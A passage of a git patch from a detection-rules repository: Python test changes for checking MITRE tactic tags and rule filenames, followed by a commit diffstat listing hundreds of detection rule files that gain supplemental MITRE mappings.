tags)``.""" - unique_names = list(dict.fromkeys(threat_tactic_names)) - missing = [f"{prefix}{name}" for name in unique_names if f"{prefix}{name}" not in rule_tags] - tagged_mitre: list[str] = [] - for t in rule_tags: - if isinstance(t, str) and t.startswith(prefix): - suffix = t.removeprefix(prefix).strip() - if suffix in attack_tactics_set: - tagged_mitre.append(suffix) - unexpected = [n for n in tagged_mitre if n not in threat_tactic_names] - return missing, unexpected - - class TestValidRules(BaseRuleTest): """Test that all detection rules load properly without duplicates.""" @@ -397,16 +363,16 @@ def test_tactic_to_technique_correlations(self): ) def test_duplicated_tactics(self): - """Check that a tactic is only defined once per framework (ATT&CK vs ATLAS may share display names).""" + """Check that a tactic is only defined once.""" for rule in self.all_rules: threat_mapping = rule.contents.data.threat - pairs = [(t.framework, t.tactic.name) for t in threat_mapping or []] - duplicates = sorted({p for p in pairs if pairs.count(p) > 1}) + tactics = [t.tactic.name for t in threat_mapping or []] + duplicates = sorted({t for t in tactics if tactics.count(t) > 1}) if duplicates: self.fail( f"{self.rule_str(rule)} duplicate tactics defined for {duplicates}. " - f"Flatten to a single entry per tactic within each framework" + f"Flatten to a single entry per tactic" ) @@ -504,42 +470,45 @@ def test_bbr_tags(self): error_rules = "\n".join(invalid_bbr_rules) self.fail(f"The following building block rule(s) have missing tag: Rule Type: BBR:\n{error_rules}") - def test_threat_tactics_have_matching_tags(self): - """MITRE ATT&CK tactics in ``rule.threat`` must match ``Tactic: `` tags (and vice versa for ATT&CK names). - - Replaces the legacy check that tied the rule filename prefix to the first tactic tag. - """ - from detection_rules.attack import tactics as attack_tactic_names + def test_primary_tactic_as_tag(self): + """Test that the primary tactic is present as a tag.""" + from detection_rules.attack import tactics - prefix = "Tactic: " - attack_tactics_set = set(attack_tactic_names) invalid = [] + tactics = set(tactics) for rule in self.all_rules: - rule_tags = rule.contents.data.tags or [] + rule_tags = rule.contents.data.tags if "Continuous Monitoring" in rule_tags or rule.contents.data.type == "machine_learning": continue threat = rule.contents.data.threat - if not threat: - continue + if threat: + missing = [] + threat_tactic_names = [e.tactic.name for e in threat] + primary_tactic = f"Tactic: {threat_tactic_names[0]}" - threat_tactic_names = _flat_threat_tactic_names(threat) - missing, unexpected = _mitre_tactic_tag_gaps( - rule_tags, threat_tactic_names, attack_tactics_set, prefix=prefix - ) + # missing primary tactic + if primary_tactic not in rule.contents.data.tags: + missing.append(primary_tactic) - if missing or unexpected: - err_msg = self.rule_str(rule) - if missing: - err_msg += f"\n expected: {missing}" - if unexpected: - err_msg += f"\n unexpected (or missing from threat mapping): {unexpected}" - invalid.append(err_msg) + # listed tactic that is not in threat mapping + tag_tactics = set(rule_tags).intersection(tactics) + missing_from_threat = list(tag_tactics.difference(threat_tactic_names)) + + if missing or missing_from_threat: + err_msg = self.rule_str(rule) + if missing: + err_msg += f"\n expected: {missing}" + if missing_from_threat: + err_msg += f"\n unexpected (or missing from threat mapping): {missing_from_threat}" + + invalid.append(err_msg) if invalid: - self.fail("Rules with misaligned tactic tags and threat mapping:\n" + "\n".join(invalid)) + err_msg = "\n".join(invalid) + self.fail(f"Rules with misaligned tags and tactics:\n{err_msg}") def test_os_tags(self): """Test that OS tags are present within rules.""" @@ -655,6 +624,33 @@ def test_timeline_has_title(self): class TestRuleFiles(BaseRuleTest): """Test the expected file names.""" + def test_rule_file_name_tactic(self): + """Test to ensure rule files have the primary tactic prepended to the filename.""" + bad_name_rules = [] + + for rule in self.all_rules: + rule_path = rule.path.resolve() + filename = rule_path.name + + # machine learning jobs should be in rules/ml or rules/integrations/ + if rule.contents.data.type == definitions.MACHINE_LEARNING: + continue + + threat = rule.contents.data.threat + authors = rule.contents.data.author + + if threat and "Elastic" in authors: + primary_tactic = threat[0].tactic.name + tactic_str = primary_tactic.lower().replace(" ", "_") + + if tactic_str != filename[: len(tactic_str)]: + bad_name_rules.append(f"{rule.id} - {Path(rule.path).name} -> expected: {tactic_str}") + + if bad_name_rules: + error_msg = "filename does not start with the primary tactic - update the tactic or the rule filename" + rule_err_str = "\n".join(bad_name_rules) + self.fail(f"{error_msg}:\n{rule_err_str}") + def test_bbr_in_correct_dir(self): """Ensure that BBR are in the correct directory.""" for rule in self.bbr: From df6505521e6f0d9d9c558cbc0ac2ef745e950e0f Mon Sep 17 00:00:00 2001 From: Mika Ayenson Date: Tue, 24 Mar 2026 18:10:32 -0500 Subject: [PATCH 11/16] add supplemental mitre mappings --- ...mmand_and_control_common_llm_endpoint.toml | 10 +- ...rol_curl_wget_spawn_via_nodejs_parent.toml | 35 ++-- ..._google_drive_malicious_file_download.toml | 15 +- ...and_and_control_pan_elastic_defend_c2.toml | 7 +- ...nd_control_suricata_elastic_defend_c2.toml | 25 ++- .../command_and_control_tunnel_qemu.toml | 13 +- ...s_genai_process_sensitive_file_access.toml | 34 +++- .../credential_access_gitleaks_execution.toml | 30 +++- ...redential_access_trufflehog_execution.toml | 25 ++- ...evasion_agent_spoofing_multiple_hosts.toml | 20 ++- ...e_evasion_deleting_websvr_access_logs.toml | 8 +- ...sion_elastic_agent_service_terminated.toml | 15 +- ..._evasion_encoding_rot13_python_script.toml | 29 +++- ...nse_evasion_genai_config_modification.toml | 16 +- ...n_genai_process_compiling_executables.toml | 23 ++- ...ss_encoding_prior_to_network_activity.toml | 39 ++++- ...ion_masquerading_space_after_filename.toml | 20 ++- ...asion_whitespace_padding_command_line.toml | 14 +- ...y_virtual_machine_fingerprinting_grep.toml | 21 ++- ..._server_local_file_inclusion_activity.toml | 46 +++++- ...server_remote_file_inclusion_activity.toml | 15 +- .../execution_aws_ec2_lolbin_via_ssm.toml | 18 ++- ...m_sendcommand_with_command_parameters.toml | 20 ++- ...rnetes_api_request_by_usual_utilities.toml | 7 +- ...ct_interactive_kubernetes_api_request.toml | 7 +- ...tes_api_activity_by_unusual_utilities.toml | 22 ++- ...ss_followed_by_kubernetes_api_request.toml | 25 ++- .../execution_git_exploit_cve_2025_48384.toml | 41 +++-- ..._pre_or_post_install_script_execution.toml | 25 ++- ...xecution_openclaw_agent_child_process.toml | 61 ++++++- ...ontainer_creation_with_host_reference.toml | 7 +- ...cution_register_github_actions_runner.toml | 22 ++- .../execution_revershell_via_shell_cmd.toml | 16 +- .../execution_sap_netweaver_jsp_webshell.toml | 23 ++- ...execution_sap_netweaver_webshell_exec.toml | 56 ++++++- ...tion_suspicious_java_netcon_childproc.toml | 28 +++- .../execution_via_github_actions_runner.toml | 53 ++++++- ...er_tracking_id_tampering_via_env_vars.toml | 81 +++++----- ...ccess_execution_susp_react_serv_child.toml | 76 ++++++++- ...s_exfiltration_new_usb_device_mounted.toml | 21 ++- ...s_file_upload_followed_by_get_request.toml | 15 +- ...ial_access_ollama_api_external_access.toml | 10 +- ..._access_zoom_meeting_with_no_passcode.toml | 10 +- ...eb_server_potential_command_injection.toml | 71 ++++++++- ...lege_escalation_echo_nopasswd_sudoers.toml | 23 ++- ...ation_setuid_setgid_bit_set_via_chmod.toml | 20 ++- ...ilege_escalation_sudo_buffer_overflow.toml | 13 +- ...privilege_escalation_sudoers_file_mod.toml | 20 ++- .../privilege_escalation_trap_execution.toml | 20 ++- ...collection_cloudtrail_logging_created.toml | 21 ++- ...nticated_bucket_access_by_rare_source.toml | 20 ++- ...cess_aws_getpassword_for_ec2_instance.toml | 23 ++- ...keyquarantine_policy_attached_to_user.toml | 21 ++- ...ial_access_iam_user_addition_to_group.toml | 25 ++- ...etrieval_attempts_from_secretsmanager.toml | 23 ++- ...cess_root_console_failure_brute_force.toml | 8 +- ...se_evasion_cloudtrail_logging_deleted.toml | 10 +- ..._evasion_cloudtrail_logging_suspended.toml | 10 +- ...ion_ec2_serial_console_access_enabled.toml | 13 +- ...defense_evasion_rds_instance_restored.toml | 23 ++- ...sion_s3_bucket_configuration_deletion.toml | 15 +- .../aws/defense_evasion_sqs_purge_queue.toml | 18 ++- ...ess_rule_added_for_remote_connections.toml | 18 ++- ...eration_via_update_assume_role_policy.toml | 20 ++- ..._multiple_discovery_api_calls_via_cli.toml | 10 +- ...overy_new_terms_sts_getcalleridentity.toml | 10 +- ...s_multi_region_service_quota_requests.toml | 10 +- ...iscovery_ssm_inventory_reconnaissance.toml | 9 +- ...cution_cloudshell_environment_created.toml | 23 ++- ...mbda_external_layer_added_to_function.toml | 21 ++- ..._new_terms_cloudformation_createstack.toml | 9 +- ...tration_dynamodb_scan_by_unusual_user.toml | 13 +- ...tration_dynamodb_table_exported_to_s3.toml | 18 ++- .../aws/exfiltration_ec2_export_task.toml | 16 +- ..._full_network_packet_capture_detected.toml | 22 ++- .../aws/exfiltration_rds_snapshot_export.toml | 18 ++- ...icy_added_for_external_account_access.toml | 19 ++- ...bucket_replicated_to_external_account.toml | 13 +- ...tration_s3_uncommon_client_user_agent.toml | 18 ++- ...ns_rare_protocol_subscription_by_user.toml | 29 +++- ..._eventbridge_rule_disabled_or_deleted.toml | 21 ++- ..._s3_bucket_enumeration_or_brute_force.toml | 16 +- .../impact_cloudtrail_logging_updated.toml | 26 ++- .../impact_cloudwatch_log_group_deletion.toml | 13 +- ...impact_cloudwatch_log_stream_deletion.toml | 13 +- .../impact_ec2_disable_ebs_encryption.toml | 23 ++- ...mpact_ec2_ebs_snapshot_access_removed.toml | 21 ++- .../aws/impact_iam_deactivate_mfa_device.toml | 26 ++- ...mk_disabled_or_scheduled_for_deletion.toml | 8 +- ..._cluster_deletion_protection_disabled.toml | 21 ++- .../aws/impact_rds_snapshot_deleted.toml | 8 +- ...t_object_uploaded_with_ransom_keyword.toml | 16 +- ...mpact_s3_static_site_js_file_uploaded.toml | 15 +- ..._unusual_object_encryption_with_sse_c.toml | 21 ++- .../initial_access_console_login_root.toml | 20 +-- ...on_token_used_from_multiple_addresses.toml | 23 ++- ...kali_user_agent_detected_with_aws_cli.toml | 23 ++- .../aws/initial_access_password_recovery.toml | 8 +- ...tance_connect_ssh_public_key_uploaded.toml | 28 +++- ...l_movement_ec2_instance_console_login.toml | 63 +++++++- ...ns_topic_message_publish_by_rare_user.toml | 24 ++- .../ml_cloudtrail_rare_method_by_city.toml | 19 ++- .../ml_cloudtrail_rare_method_by_user.toml | 55 +++++-- ...ttempt_to_register_virtual_mfa_device.toml | 19 ++- .../persistence_ec2_network_acl_creation.toml | 17 +- ...e_ec2_route_table_modified_or_deleted.toml | 19 ++- ..._group_configuration_change_detection.toml | 30 +++- ..._iam_api_calls_via_user_session_token.toml | 21 ++- ...nce_iam_create_login_profile_for_root.toml | 10 +- ...persistence_iam_oidc_provider_created.toml | 28 +++- ...ce_iam_roles_anywhere_profile_created.toml | 23 ++- ...usted_anchor_created_with_external_ca.toml | 10 +- ...persistence_iam_saml_provider_created.toml | 18 ++- ..._created_access_keys_for_another_user.toml | 24 +-- ...oor_invoke_function_for_any_principal.toml | 21 ++- ...nce_rds_db_instance_password_modified.toml | 14 +- .../persistence_rds_instance_made_public.toml | 13 +- ...oute_53_domain_transfer_lock_disabled.toml | 21 ++- ..._53_hosted_zone_associated_with_a_vpc.toml | 21 ++- .../aws/persistence_route_table_created.toml | 19 ++- ...e_sensitive_operations_via_cloudshell.toml | 27 +++- ...sistence_sts_assume_role_with_new_mfa.toml | 33 +++- ...tratoraccess_policy_attached_to_group.toml | 24 +-- ...stratoraccess_policy_attached_to_role.toml | 24 +-- ...stratoraccess_policy_attached_to_user.toml | 24 +-- ...tomer_managed_policy_attached_to_role.toml | 23 ++- ..._escalation_iam_saml_provider_updated.toml | 23 ++- ...alation_iam_update_assume_role_policy.toml | 29 +++- ...escalation_role_assumption_by_service.toml | 13 +- ...ge_escalation_role_assumption_by_user.toml | 36 ++++- ...oot_from_rare_user_and_member_account.toml | 38 ++++- ...rivilege_escalation_sts_role_chaining.toml | 31 +++- ...point_access_from_unusual_application.toml | 35 +++- ...ss_by_unusual_public_client_via_graph.toml | 24 ++- ...s_azure_entra_susp_device_code_signin.toml | 19 ++- ...al_signin_then_arc_credential_listing.toml | 17 +- ...ial_access_entra_id_suspicious_signin.toml | 35 +++- ..._access_key_vault_excessive_retrieval.toml | 18 ++- ..._full_network_packet_capture_detected.toml | 16 +- ...ccess_storage_account_key_regenerated.toml | 26 ++- ...se_evasion_automation_runbook_deleted.toml | 14 +- .../defense_evasion_event_hub_deletion.toml | 18 ++- ...nse_evasion_kubernetes_events_deleted.toml | 10 +- ...ense_evasion_network_watcher_deletion.toml | 10 +- ...curity_alert_suppression_rule_created.toml | 8 +- ...utomation_runbook_created_or_modified.toml | 15 +- ...torage_blob_download_azcopy_sas_token.toml | 18 ++- ...ct_key_vault_modified_by_unusual_user.toml | 19 ++- ...ster_credential_access_unusual_source.toml | 28 +++- ...e_principal_signin_multiple_countries.toml | 23 ++- ..._actor_token_user_impersonation_abuse.toml | 26 ++- ...d_device_code_auth_with_broker_client.toml | 32 ++-- ...s_entra_id_external_guest_user_invite.toml | 16 +- ..._id_federated_login_by_unusual_client.toml | 27 +++- ...a_id_first_time_seen_device_code_auth.toml | 32 ++-- ...ingle_session_from_multiple_addresses.toml | 15 +- ...sent_grant_via_registered_application.toml | 21 ++- ..._code_grant_unusual_app_resource_user.toml | 28 +++- ...via_first_party_microsoft_application.toml | 28 +++- ...s_entra_id_protection_alerts_for_user.toml | 41 ++++- ...ra_id_protection_confirmed_compromise.toml | 41 ++++- ...tra_id_rare_app_id_for_principal_auth.toml | 26 ++- ...cation_requirement_for_principal_user.toml | 22 ++- ...ous_oauth_flow_via_auth_broker_to_drs.toml | 29 +++- ...s_entra_id_unusual_ropc_login_attempt.toml | 23 ++- ...al_access_entra_id_user_reported_risk.toml | 17 +- ...ph_first_occurrence_of_client_request.toml | 26 ++- .../azure/ml_azure_rare_event_failures.toml | 49 +++--- .../azure/ml_azure_rare_method_by_city.toml | 38 ++++- .../ml_azure_rare_method_by_country.toml | 20 ++- .../azure/ml_azure_rare_method_by_user.toml | 55 +++++-- ...ersistence_automation_account_created.toml | 23 +-- ...d_application_credential_modification.toml | 24 ++- ...id_conditional_access_policy_modified.toml | 21 ++- ...id_global_administrator_role_assigned.toml | 23 ++- ...stence_entra_id_mfa_disabled_for_user.toml | 41 ++++- ..._entra_id_pim_user_added_global_admin.toml | 22 ++- ...ged_identity_management_role_modified.toml | 25 ++- ...rt_to_prt_transition_from_user_device.toml | 29 +++- ...d_service_principal_credentials_added.toml | 22 ++- ...e_principal_federated_issuer_modified.toml | 28 +++- ...ntra_id_suspicious_adrs_token_request.toml | 18 ++- ..._suspicious_cloud_device_registration.toml | 23 ++- ...nant_domain_federation_via_audit_logs.toml | 35 +++- ..._added_as_owner_for_azure_application.toml | 19 ++- ..._as_owner_for_azure_service_principal.toml | 23 ++- ...id_user_signed_in_from_unusual_device.toml | 28 +++- ...sistence_event_hub_created_or_updated.toml | 28 +++- ...ce_graph_eam_addition_or_modification.toml | 23 ++- ..._protect_alert_followed_by_device_reg.toml | 21 +-- ...ure_rbac_administrator_roles_assigned.toml | 24 ++- ..._elevate_to_user_administrator_access.toml | 23 ++- ...on_kubernetes_aks_rolebinding_created.toml | 20 ++- .../command_and_control_beaconing.toml | 12 +- ...and_control_beaconing_high_confidence.toml | 12 +- ...socks_proxy_detected_inside_container.toml | 7 +- ...teractive_file_download_from_internet.toml | 55 ++++--- ...control_tunneling_and_port_forwarding.toml | 7 +- ...cloud_creds_search_inside_a_container.toml | 15 +- ..._files_compression_inside_a_container.toml | 7 +- ...r_passwords_search_inside_a_container.toml | 33 +++- ...ss_service_account_token_or_cert_read.toml | 15 +- ..._decoded_payload_piped_to_interpreter.toml | 89 ++++++----- ...le_creation_execution_deletion_cradle.toml | 15 +- ...s_execution_from_suspicious_directory.toml | 44 +++-- ...ed_object_modified_inside_a_container.toml | 38 ++++- ...potential_evasion_via_encoded_payload.toml | 7 +- .../discovery_dns_enumeration.toml | 23 +-- .../discovery_environment_enumeration.toml | 12 +- ...overy_kubelet_certificate_file_access.toml | 20 ++- ...t_pod_discovery_via_builtin_utilities.toml | 7 +- ..._enumeration_from_interactive_process.toml | 13 +- ...covery_service_account_namespace_read.toml | 25 ++- ...work_tool_launched_inside_a_container.toml | 15 +- ...nt_binary_launched_inside_a_container.toml | 15 +- ...ct_interactive_kubernetes_api_request.toml | 25 ++- ...e_creation_in_system_binary_locations.toml | 41 +++-- .../execution_kubeletctl_execution.toml | 7 +- ...stener_established_inside_a_container.toml | 33 +++- ...payload_downloaded_and_piped_to_shell.toml | 36 +++-- ...irect_kubelet_access_via_process_args.toml | 15 +- ...ecutable_via_chmod_inside_a_container.toml | 20 ++- ...ractive_interpreter_command_execution.toml | 84 ++++++---- .../execution_tool_installation.toml | 15 +- ...ication_of_persistence_relevant_files.toml | 64 ++++++-- ..._keys_modification_inside_a_container.toml | 20 ++- ...e_suspicious_echo_or_printf_execution.toml | 107 +++++++++++-- ...ous_webserver_child_process_execution.toml | 71 +++++++-- ...aunched_inside_a_privileged_container.toml | 15 +- ...scape_via_modified_release_agent_file.toml | 15 +- ...commended_events_to_monitor_promotion.toml | 30 +++- ...ration_ml_high_bytes_destination_port.toml | 16 +- ...high_bytes_written_to_external_device.toml | 8 +- ...es_written_to_external_device_airdrop.toml | 8 +- ...re_process_writing_to_external_device.toml | 8 +- ...ml_dga_activity_using_sunburst_domain.toml | 17 +- ...d_control_ml_dga_high_sum_probability.toml | 18 ++- ...l_ml_dns_request_high_dga_probability.toml | 17 +- ..._request_predicted_to_be_a_dga_domain.toml | 17 +- ...istence_suspicious_file_modifications.toml | 54 ++++++- ...ion_gcp_pub_sub_subscription_creation.toml | 10 +- ...collection_gcp_pub_sub_topic_creation.toml | 16 +- ...nse_evasion_gcp_firewall_rule_created.toml | 8 +- ...nse_evasion_gcp_firewall_rule_deleted.toml | 8 +- ...se_evasion_gcp_firewall_rule_modified.toml | 8 +- ...e_evasion_gcp_logging_bucket_deletion.toml | 8 +- ...nse_evasion_gcp_logging_sink_deletion.toml | 8 +- ...ion_gcp_pub_sub_subscription_deletion.toml | 16 +- ...se_evasion_gcp_pub_sub_topic_deletion.toml | 16 +- ...storage_bucket_configuration_modified.toml | 8 +- ...p_storage_bucket_permissions_modified.toml | 39 ++++- ...virtual_private_cloud_network_deleted.toml | 18 ++- ...p_virtual_private_cloud_route_created.toml | 13 +- ...p_virtual_private_cloud_route_deleted.toml | 13 +- ...tration_gcp_logging_sink_modification.toml | 21 ++- ...l_access_gcp_iam_custom_role_creation.toml | 32 +++- .../gcp/ml_gcp_rare_method_by_city.toml | 20 ++- .../gcp/ml_gcp_rare_method_by_country.toml | 38 ++++- .../gcp/ml_gcp_rare_method_by_user.toml | 56 +++++-- ..._gcp_iam_service_account_key_deletion.toml | 16 +- ...e_gcp_key_created_for_service_account.toml | 8 +- ...rsistence_gcp_service_account_created.toml | 8 +- .../github/execution_github_app_deleted.toml | 21 ++- ..._high_number_of_cloned_repos_from_pat.toml | 21 ++- .../execution_new_github_app_installed.toml | 29 +++- ...ration_high_number_of_cloning_by_user.toml | 20 ++- ...b_repository_activity_from_unusual_ip.toml | 29 +++- ...umber_of_closed_pull_requests_by_user.toml | 12 +- ...protected_branch_force_pushes_by_user.toml | 12 +- ...protected_branch_force_pushes_by_user.toml | 12 +- ...github_actions_bot_first_push_to_repo.toml | 22 ++- ...ub_actions_workflow_injection_blocked.toml | 15 +- ...ss_github_register_self_hosted_runner.toml | 13 +- .../persistence_github_org_owner_added.toml | 33 +++- .../github/persistence_new_pat_created.toml | 12 +- ...tence_organization_owner_role_granted.toml | 23 ++- ...ship_transferred_via_google_workspace.toml | 18 ++- ...yption_key_accessed_by_anonymous_user.toml | 18 ++- ...ed_from_blocklist_in_google_workspace.toml | 12 +- ...d_to_google_workspace_trusted_domains.toml | 17 +- ..._workspace_bitlocker_setting_disabled.toml | 12 +- ...th_login_from_third_party_application.toml | 28 +++- ...marketplace_modified_to_allow_any_app.toml | 12 +- ..._google_workspace_admin_role_deletion.toml | 16 +- ...le_workspace_mfa_enforcement_disabled.toml | 39 ++++- ..._user_added_to_google_workspace_group.toml | 18 ++- ...ogle_workspace_suspended_user_renewed.toml | 28 +++- ...ed_to_external_drive_with_app_consent.toml | 41 ++++- ...tion_added_to_google_workspace_domain.toml | 13 +- ..._google_workspace_2sv_policy_disabled.toml | 29 +++- ...workspace_admin_role_assigned_to_user.toml | 23 ++- ..._workspace_api_access_granted_via_dwd.toml | 16 +- ...e_workspace_custom_admin_role_created.toml | 24 ++- ...le_workspace_password_policy_modified.toml | 16 +- ...stence_google_workspace_role_modified.toml | 16 +- ...pace_user_organizational_unit_changed.toml | 23 ++- ...led_for_google_workspace_organization.toml | 16 +- ...ure_arc_proxy_secret_configmap_access.toml | 31 +++- ...covery_denied_service_account_request.toml | 37 ++++- ...mission_enumeration_by_anonymous_user.toml | 20 ++- ...covery_suspicious_self_subject_review.toml | 13 +- ...ymous_create_update_patch_pod_request.toml | 7 +- .../execution_forbidden_creation_request.toml | 18 ++- ...bidden_request_from_unsual_user_agent.toml | 14 +- ...nusual_request_response_by_user_agent.toml | 27 +++- ...l_access_anonymous_request_authorized.toml | 14 +- ...nce_cluster_admin_rolebinding_created.toml | 20 +-- ...ed_service_created_with_type_nodeport.toml | 16 +- ...nsitive_role_creation_or_modification.toml | 20 +-- ..._service_account_bound_to_clusterrole.toml | 20 +-- ...ted_with_excessive_linux_capabilities.toml | 15 +- ...calation_pod_created_with_hostnetwork.toml | 15 +- ...ege_escalation_privileged_pod_created.toml | 15 +- ...nge_followed_by_workload_modification.toml | 15 +- ...e_workload_modification_by_user_agent.toml | 14 +- ..._service_account_rbac_write_operation.toml | 15 +- ...ignment_of_controller_service_account.toml | 15 +- ...ovement_ml_high_mean_rdp_process_args.toml | 15 +- ...ent_ml_high_mean_rdp_session_duration.toml | 15 +- ...ral_movement_ml_high_remote_file_size.toml | 19 ++- ...ml_high_variance_rdp_session_duration.toml | 15 +- ...ovement_ml_rare_remote_file_directory.toml | 8 +- ...ovement_ml_rare_remote_file_extension.toml | 8 +- ...spike_in_connections_from_a_source_ip.toml | 15 +- ...ke_in_connections_to_a_destination_ip.toml | 15 +- ...al_movement_ml_spike_in_rdp_processes.toml | 15 +- ...ent_ml_spike_in_remote_file_transfers.toml | 8 +- ...nt_ml_unusual_time_for_an_rdp_session.toml | 15 +- ...ilbox_access_by_unusual_client_app_id.toml | 23 ++- ...ion_onedrive_excessive_file_downloads.toml | 12 +- ...arepoint_file_download_via_powershell.toml | 24 ++- ...a_id_device_reg_via_oauth_redirection.toml | 31 +++- ...on_entra_id_susp_oauth2_authorization.toml | 25 ++- ...n_exchange_anti_phish_policy_deletion.toml | 11 +- ...exchange_dkim_signing_config_disabled.toml | 11 +- ...e_evasion_exchange_dlp_policy_removed.toml | 7 +- ..._exchange_exchange_safelinks_disabled.toml | 11 +- ...ange_mailbox_audit_bypass_association.toml | 17 +- ...change_malware_filter_policy_deletion.toml | 8 +- ...sion_exchange_malware_filter_rule_mod.toml | 13 +- ...xchange_new_inbox_rule_delete_or_move.toml | 23 ++- ...on_exchange_safe_attach_rule_disabled.toml | 8 +- ...vasion_mfa_notification_email_deleted.toml | 23 ++- ...on_sharepoint_sharing_policy_weakened.toml | 10 +- ..._teams_custom_app_interaction_allowed.toml | 10 +- ...evasion_teams_external_access_enabled.toml | 10 +- ...tion_exchange_transport_rule_creation.toml | 21 ++- ..._exchange_transport_rule_modification.toml | 21 ++- ...pliance_potential_ransomware_activity.toml | 13 +- ...tra_id_portal_login_impossible_travel.toml | 23 ++- ...sent_grant_via_registered_application.toml | 21 ++- ...via_first_party_microsoft_application.toml | 25 ++- ..._identity_unusual_sso_errors_for_user.toml | 28 +++- ...a_id_global_administrator_role_assign.toml | 23 ++- ...e_exchange_management_role_assignment.toml | 22 ++- ...picious_mailbox_permission_delegation.toml | 23 ++- ...ersistence_teams_guest_access_enabled.toml | 16 +- ...nge_new_or_modified_federation_domain.toml | 23 ++- ...harepoint_site_collection_admin_added.toml | 22 +-- ...l_access_attempted_bypass_of_okta_mfa.toml | 21 ++- ...mpts_to_brute_force_okta_user_account.toml | 13 +- ...vents_from_single_device_behind_proxy.toml | 28 +++- ..._token_hashes_for_single_okta_session.toml | 21 ++- ...multiple_user_agent_os_authentication.toml | 21 ++- ...ccess_okta_aitm_session_cookie_replay.toml | 24 ++- ...users_with_the_same_device_token_hash.toml | 12 +- ...kta_brute_force_device_token_rotation.toml | 8 +- ...ta_mfa_bombing_via_push_notifications.toml | 21 ++- ...l_okta_bombing_via_push_notifications.toml | 21 ++- ...tial_access_user_impersonation_access.toml | 19 ++- ...tempt_to_deactivate_okta_network_zone.toml | 17 +- ..._app_client_credential_token_exchange.toml | 17 +- ...kta_attempt_to_deactivate_okta_policy.toml | 17 +- ...ttempt_to_deactivate_okta_policy_rule.toml | 12 +- ...on_okta_attempt_to_delete_okta_policy.toml | 33 +++- ...ta_attempt_to_delete_okta_policy_rule.toml | 12 +- ...a_attempt_to_modify_okta_network_zone.toml | 12 +- ...on_okta_attempt_to_modify_okta_policy.toml | 17 +- ...ta_attempt_to_modify_okta_policy_rule.toml | 12 +- ...ser_password_reset_or_unlock_attempts.toml | 20 ++- ...ttempt_to_deactivate_okta_application.toml | 21 ++- ...ta_attempt_to_delete_okta_application.toml | 21 ++- ...ta_attempt_to_modify_okta_application.toml | 14 +- .../okta/impact_possible_okta_dos_attack.toml | 13 +- ...rrence_user_session_started_via_proxy.toml | 31 +++- ...initial_access_okta_fastpass_phishing.toml | 8 +- ...ta_user_attempted_unauthorized_access.toml | 11 +- ...ss_sign_in_events_via_third_party_idp.toml | 26 ++- ...cation_sso_from_unknown_client_device.toml | 24 ++- ...icious_activity_reported_by_okta_user.toml | 41 +---- ...ent_multiple_sessions_for_single_user.toml | 23 ++- ...tor_privileges_assigned_to_okta_group.toml | 21 ++- ...inistrator_role_assigned_to_okta_user.toml | 24 ++- ...ence_attempt_to_create_okta_api_token.toml | 15 +- ...set_mfa_factors_for_okta_user_account.toml | 21 ++- ...mfa_deactivation_with_no_reactivation.toml | 23 ++- ...e_new_idp_successfully_added_by_admin.toml | 33 +++- ..._or_delete_application_sign_on_policy.toml | 24 ++- ...unt_privileged_process_events_by_user.toml | 8 +- ..._process_command_line_entropy_by_user.toml | 16 +- ...l_linux_rare_process_executed_by_user.toml | 8 +- ..._high_sum_concurrent_sessions_by_user.toml | 16 +- ...access_ml_okta_rare_host_name_by_user.toml | 24 ++- ...cess_ml_okta_rare_region_name_by_user.toml | 21 ++- ...access_ml_okta_rare_source_ip_by_user.toml | 21 ++- ..._group_application_assignment_changes.toml | 16 +- ...okta_spike_in_group_lifecycle_changes.toml | 29 +++- ...kta_spike_in_group_membership_changes.toml | 19 ++- ...okta_spike_in_group_privilege_changes.toml | 16 +- ..._in_user_lifecycle_management_changes.toml | 21 ++- ...ws_high_count_group_management_events.toml | 24 ++- ...ndows_high_count_special_logon_events.toml | 8 +- ...gh_count_special_privilege_use_events.toml | 19 ++- ..._count_user_account_management_events.toml | 24 ++- ...access_ml_windows_rare_device_by_user.toml | 16 +- ...ss_ml_windows_rare_group_name_by_user.toml | 32 +++- ...ndows_rare_privilege_assigned_to_user.toml | 19 ++- ...s_ml_windows_rare_region_name_by_user.toml | 16 +- ...ess_ml_windows_rare_source_ip_by_user.toml | 16 +- ..._ml_rare_process_for_a_parent_process.toml | 8 +- ...se_evasion_ml_rare_process_for_a_user.toml | 8 +- ...ous_windows_process_cluster_from_host.toml | 8 +- ...s_process_cluster_from_parent_process.toml | 8 +- ...ous_windows_process_cluster_from_user.toml | 8 +- ...and_control_aws_cli_endpoint_url_used.toml | 8 +- ...mand_and_control_cat_network_activity.toml | 12 +- ...and_control_cupsd_foomatic_rip_netcon.toml | 25 ++- ...and_control_curl_socks_proxy_detected.toml | 12 +- ...ent_egress_netcon_from_sus_executable.toml | 20 ++- ..._git_repo_or_file_download_to_sus_dir.toml | 12 +- ...nd_and_control_ip_forwarding_activity.toml | 12 +- ...ntrol_kubectl_networking_modification.toml | 12 +- ..._control_linux_chisel_client_activity.toml | 7 +- ...mand_and_control_linux_kworker_netcon.toml | 8 +- ...nd_control_linux_proxychains_activity.toml | 12 +- ..._and_control_linux_ssh_x11_forwarding.toml | 21 ++- ...linux_suspicious_proxychains_activity.toml | 12 +- ...l_linux_tunneling_and_port_forwarding.toml | 17 +- ...ontrol_linux_tunneling_via_ssh_option.toml | 7 +- ...trol_potential_tunneling_command_line.toml | 7 +- ...work_activity_from_unknown_executable.toml | 29 +++- ...mand_and_control_telegram_api_request.toml | 40 +++-- ...d_and_control_tunneling_via_earthworm.toml | 7 +- ...ess_aws_creds_search_inside_container.toml | 28 +++- ...ial_access_collection_sensitive_files.toml | 8 +- ...ve_files_compression_inside_container.toml | 7 +- .../credential_access_credential_dumping.toml | 15 +- ...ntial_access_gdb_init_process_hooking.toml | 15 +- ...credential_access_gdb_process_hooking.toml | 23 ++- .../credential_access_gh_auth_via_nodejs.toml | 30 +++- ...ernetes_service_account_secret_access.toml | 28 +++- ...edential_access_manual_memory_dumping.toml | 15 +- ...tential_linux_ssh_bruteforce_internal.toml | 20 ++- ...ntial_successful_linux_ssh_bruteforce.toml | 15 +- ...ential_access_proc_credential_dumping.toml | 15 +- ..._or_passwords_search_inside_container.toml | 15 +- .../credential_access_ssh_backdoor_log.toml | 20 ++- ...cess_ssh_password_grabbing_via_strace.toml | 7 +- ...instance_metadata_service_api_request.toml | 20 ++- ...ion_attempt_to_disable_auditd_service.toml | 15 +- ...tempt_to_disable_iptables_or_firewall.toml | 20 ++- ...ion_attempt_to_disable_syslog_service.toml | 15 +- ...evasion_authorized_keys_file_deletion.toml | 15 +- ..._base32_encoding_or_decoding_activity.toml | 20 ++- 